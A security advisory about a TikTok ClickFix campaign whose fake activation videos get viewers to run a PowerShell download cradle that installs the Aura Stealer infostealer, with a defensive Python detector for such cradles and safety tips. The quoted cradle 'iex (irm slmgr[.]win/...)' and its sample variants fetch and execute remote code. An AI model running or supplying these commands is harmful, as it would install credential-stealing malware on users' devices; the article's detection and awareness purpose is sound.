Cybercriminals are tricking people with TikTok videos that look like free activation guides for popular software such as Windows, Spotify, and Netflix, but actually spread malware that steals your information.
These fake videos claim to show how to activate things like Windows, Microsoft 365, Photoshop, and Discord Nitro, but their real purpose is to infect viewers’ devices.
What is Happening?
These videos use ClickFix, a social engineering technique that presents itself as a helpful fix but actually convinces users to run harmful PowerShell commands or scripts that install malware.
Each video shows a quick, single-line command and instructs viewers to enter it in PowerShell as an administrator.
Viewers are told to run a command such as the following:
iex (irm slmgr[.]win/photoshop) |
The URL shown in these fake videos changes with the software being impersonated, so a Windows activation scam uses a link containing "windows" instead of "photoshop". When users run the recommended command, irm (Invoke-RestMethod) fetches content from the remote site (slmgr[.]win) and iex (Invoke-Expression) executes it, pulling down further malicious scripts.
This script downloads two files from Cloudflare Pages. The first ("updater.exe") is Aura Stealer, which grabs browser passwords, cookies, cryptocurrency wallets, and app credentials, then uploads them to the attackers.
A second file ("source.exe") is also downloaded; it compiles more malicious code and launches it in memory.
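The pattern behind the lure is the same in every video: one PowerShell statement that fetches text from a remote host and immediately executes it (a "download cradle"). Defenders can hunt for exactly that in PowerShell script block logs. The following is an added example written for this article, not code from the original page or from the malware campaign; it runs over a few constructed script block lines (not real telemetry), flags statements that combine an execute verb (iex / Invoke-Expression) with a fetch verb (irm, iwr, DownloadString), refangs the "[.]" notation, and records the path segment that the videos vary per impersonated product. The regexes and sample lines are assumptions for illustration.

```python
"""Flag PowerShell download cradles of the kind ClickFix lures ask victims to paste."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample script-block text, roughly what PowerShell script block
# logging (Event ID 4104) would record. Not real telemetry.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm slmgr[.]win/photoshop)",
    "iex (irm slmgr[.]win/windows)",
    "Invoke-Expression (Invoke-RestMethod -Uri 'https://slmgr[.]win/spotify')",
    "IEX (New-Object Net.WebClient).DownloadString('http://slmgr[.]win/m365')",
    "Get-ChildItem C:\\Users | Select-Object Name",
    "irm https://aka.ms/install-powershell.ps1 -OutFile ps.ps1",
]

# "Execute a string" verbs and their aliases.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# "Fetch from the network" verbs, aliases and .NET methods.
FETCH_RE = re.compile(
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloaddata)\b", re.I
)
# Hostname (defanged "[.]" or plain "."), optional scheme, optional path.
REMOTE_RE = re.compile(
    r"(?:(?P<scheme>https?://))?"
    r"(?P<host>[a-z0-9-]+(?:(?:\[\.\]|\.)[a-z0-9-]+)+)"
    r"(?P<path>/[^\s)'\"]*)?",
    re.I,
)


@dataclass
class Finding:
    command: str
    host: Optional[str]  # refanged hostname the cradle fetches from, if found
    path: Optional[str]
    lure: Optional[str]  # first path segment, varied per impersonated product


def refang(host: str) -> str:
    """Turn the article's 'slmgr[.]win' notation back into a real hostname."""
    return host.replace("[.]", ".")


def is_download_cradle(command: str) -> bool:
    """True when one statement both fetches remote content and executes it."""
    return bool(EXEC_RE.search(command) and FETCH_RE.search(command))


def extract_remote(command: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (host, path) of the first URL-like token that has a scheme or a path.

    Requiring a scheme or path skips dotted identifiers such as Net.WebClient.
    """
    for m in REMOTE_RE.finditer(command):
        if m.group("scheme") or m.group("path"):
            return m.group("host"), m.group("path")
    return None, None


def scan(script_blocks: List[str]) -> List[Finding]:
    """Return one Finding per script block that looks like a download cradle."""
    findings = []
    for cmd in script_blocks:
        if not is_download_cradle(cmd):
            continue
        host, path = extract_remote(cmd)
        lure = path.strip("/").split("/")[0] if path else ""
        findings.append(Finding(cmd, refang(host) if host else None, path, lure or None))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_SCRIPT_BLOCKS):
        print(f"cradle -> {f.host}{f.path or ''} (lure: {f.lure})")
```

The last two sample lines are deliberately benign: a plain directory listing, and an irm call that saves to disk without executing, so neither is flagged. In practice you would feed this the ScriptBlockText field of Event ID 4104 records and alert on any hit, since a legitimate administrator rarely needs to pipe freshly downloaded text straight into Invoke-Expression.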
How to Stay Safe?
- Never run commands copied from a website directly into PowerShell, Command Prompt, the File Explorer address bar, or a Mac or Linux terminal unless you totally trust the source.
- Always look for official support or updates on the software's real website.
- Check for HTTPS and domain spelling: Look for "https://" and double-check the spelling of website addresses before downloading anything.
- Turn on two-factor authentication: Add extra protection to your accounts, so even if your password is stolen, attackers cannot log in easily.
- Back up important data: Keep copies of important files in case malware leads to data loss or lockout.